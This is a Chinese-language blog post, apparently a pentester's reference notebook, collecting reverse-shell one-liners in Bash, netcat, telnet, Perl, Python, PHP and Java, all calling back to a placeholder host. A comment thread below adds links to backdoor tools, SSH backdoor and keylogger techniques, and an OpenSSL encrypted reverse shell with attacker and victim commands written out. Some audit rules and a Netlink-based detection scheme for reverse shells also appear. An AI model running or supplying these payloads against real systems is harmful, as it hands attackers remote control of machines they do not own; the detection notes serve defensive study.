=Start=
缘由:
在工作中有时会需要用各种语言的反弹shell来进行测试,在此记录一下,方便要用到的时候做个参考。
正文:
参考解答:
步骤一:先在本地监听
root@kali:~# nc -nvlp 12345
备注:需要将上面的 12345 端口和下面要执行命令中的端口进行对应。
步骤二:再在远程执行反弹shell命令
# Bash
bash -i >& /dev/tcp/x.x.x.x/12345 0>&1
# nc支持’-e’
nc -e /bin/sh x.x.x.x 12345
# nc不支持’-e’
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 12345 >/tmp/f
# Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 12345 0</tmp/p | /bin/bash 1>/tmp/p
# Perl
perl -e 'use Socket;$i="x.x.x.x";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("x.x.x.x",12345);exec("/bin/sh -i <&3 >&3 2>&3");'
# Java
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/12345;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
参考链接:
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://highon.coffee/blog/reverse-shell-cheat-sheet/
- https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
- http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
- http://www.91ri.org/9367.html
- https://www.leavesongs.com/PYTHON/python-shell-backdoor.html
- https://www.waitalone.cn/linux-shell-rebound-under-way.html
=END=
《 “各种反弹shell记录/总结” 》 有 18 条评论
[ Pentest ] 如何实现渗透过程中的 Fileless 反弹 shell
https://0x00sec.org/t/running-binaries-without-leaving-tracks/2166
https://0x00sec.org/t/spawning-reverse-shells/2133/8
https://0x00sec.org/t/linux-infecting-running-processes/1097
https://0x00sec.org/t/remote-exploit-shellcode-without-sockets/1440
`
Option 1. Memory File Systems
Option 2. Evil Kernel Module
Option 3. Abusing gdb
Option 4. More gdb abusing
`
PHP root (suid) reverse shell
https://github.com/mempodippy/snodew
`
snodew is a PHP reverse shell backdoor which uses a small suid binary to escalate privileges on connection
snodew is made mainly to work alongside vlany but can also be setup as a regular root backdoor
`
反弹shell监控
http://pirogue.org/2017/07/25/reverse-shell/
`
一、跟踪系统调用
1. strace bash test.sh
2. strace -c bash test.sh
二、audit监控分析
auditctl -A exit,always -S connect
auditctl -a exit,always -F arch=b64 -F a0=2 -F a1=1 -S socket -k CONNECTION
auditctl -a exit,always -F arch=b64 -S connect
`
【技术分享】linux各种一句话反弹shell总结
http://bobao.360.cn/learning/detail/4551.html
https://github.com/smartFlash/pySecurity/blob/master/zh-cn/0x11.md
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://www.freebuf.com/news/142195.html
http://brieflyx.me/2015/linux-tools/socat-introduction/
【技术分享】另类WebShell监测机制–基于auditd
https://mp.weixin.qq.com/s/arF1PKKfZ143XxcqnwKSiA
[工具介绍] 反弹 shell 管理工具
http://www.jianshu.com/p/8dc5a4abcc09
rsg – 通过多种方式生成反弹 Shell 的工具
https://github.com/mthbernardes/rsg
网络渗透过程中常见的 Shell 反弹方法
https://bitrot.sh/cheatsheet/14-12-2017-pivoting/
Reverse Shell as a Service
https://github.com/lukechilds/reverse-shell
Bash Special Redirection 分析
https://mp.weixin.qq.com/s/D_k_Gv3dcG91Rlw-fyMoQA
https://www.secpulse.com/archives/71494.html
gorsh – go 语言编写的反弹 Shell
https://github.com/audibleblink/gorsh
自动化反弹Shell防御技术
https://mp.weixin.qq.com/s/5N0uYhjo8Tub1CfBLg1zjg
`
0×1 反弹Shell解析
0×2 总体思路
0×3 失败尝试
Round 1 Syslog history of BASH
Round 2 proc文件系统
Round 3 bash打开事件
0×4 成功
Round 4 Netlink Socket
优点:
快速响应:由于Netlink通信机制占用系统资源很少,对于Shell进程启动事件的响应基本无延时,后续主动检测确认为反弹Shell后直接Kill。
绕过较难:由于一般反弹Shell的姿势都是调用bash且通过重定向获取bash的标准输入输出,因此没有前置经验的情况下基本都会被防御住。
信息全面:发现反弹Shell后,收集到Shell相关的信息包括PID、SID(可用于判断究竟是哪个进程组出现了漏洞)、当前路径(方便查找Webshell)、系统用户等,可以再深入挖掘这个技术的应用场景,也可以统一汇总到SOC等分析平台进行联动。
缺点:
绕过风险:仅能通过进程执行文件名判断是否为Shell进程,上传可执行文件、拷贝Bash文件到其他路径等方法会绕过这个方法。严格限制上传文件目录的执行权限、Bash文件权限可以有效限制这个风险。
检测盲区:无法检测到直接调用Webshell执行命令的事件,因此低权限无交互的命令可以通过Webshell执行到。
`
https://github.com/dbrandt/proc_events
shellver – 一句话反弹 Shell 生成工具
https://github.com/0xR0/shellver
xsshell – XSS 反向 shell 框架
https://github.com/raz-varren/xsshell
用Golang实现的通过DNS进行通信的反弹shell(Chashell: Go reverse shell that communicates over DNS)
https://github.com/sysdream/chashell
编写有密码保护的反弹Shell(Linux/x64)
https://medium.com/@0x0FFB347/writing-a-password-protected-reverse-shell-linux-x64-5f4d3a28d91a
metasploit上集成的一些反弹shell命令列表
https://github.com/rapid7/metasploit-framework/tree/master/modules/payloads/singles/cmd/unix
Rapid7 Vulnerability & Exploit Database
https://www.rapid7.com/db/
Complete guide to Reverse Shells
https://www.metahackers.pro/reverse-shells-101/
Spawing real TTY shells
https://www.metahackers.pro/spawing-tty-shells/
Linux SSH Backdoor分析排查
https://www.cnblogs.com/17bdw/p/9170381.html
`
1、SSH后门分类
SSH后门方式有以下几种:
软链接
SSH Server wrapper
SSH Keylogger
2、软链接
3、SSH Server wrapper
4、SSH Keylogger
5、参考
`
https://joychou.org/hostsec/linux-ssh-backdoor.html
http://pastebin.com/2NgL8SDE
http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/
https://diogomonica.com/2011/02/03/poor-mans-ssh-keylogger/
https://_thorns.gitbooks.io/sec/content/sshbackdoor_md.html
http://drops.wooyun.org/tips/1951
Day 43: Reverse Shell with OpenSSL
https://int0x33.medium.com/day-43-reverse-shell-with-openssl-1ee2574aa998
OPENSSL FOR REVERSE SHELL
https://rioasmara.com/2020/06/22/openssl-for-reverse-shell/
Reverse shell
https://gtfobins.github.io/gtfobins/openssl/
Reverse shell
https://mal-hiboux.gitlab.io/howl-to/docs/05-persistence/03-reverse-shell/
`
# 在攻击者机器上执行监听命令
user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
// or
user@attack$ ncat –ssl -vv -l -p 4242
# 在受害者机器上执行反弹shell回连命令
user@victim$ mkfifo /tmp/s; /bin/sh -i &1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
`
Encrypted reverse shell
https://www.reddit.com/r/hackthebox/comments/i4qgu4/encrypted_reverse_shell/
[…] 各种反弹shell记录/总结https://ixyzero.com/blog/archives/3275.html […]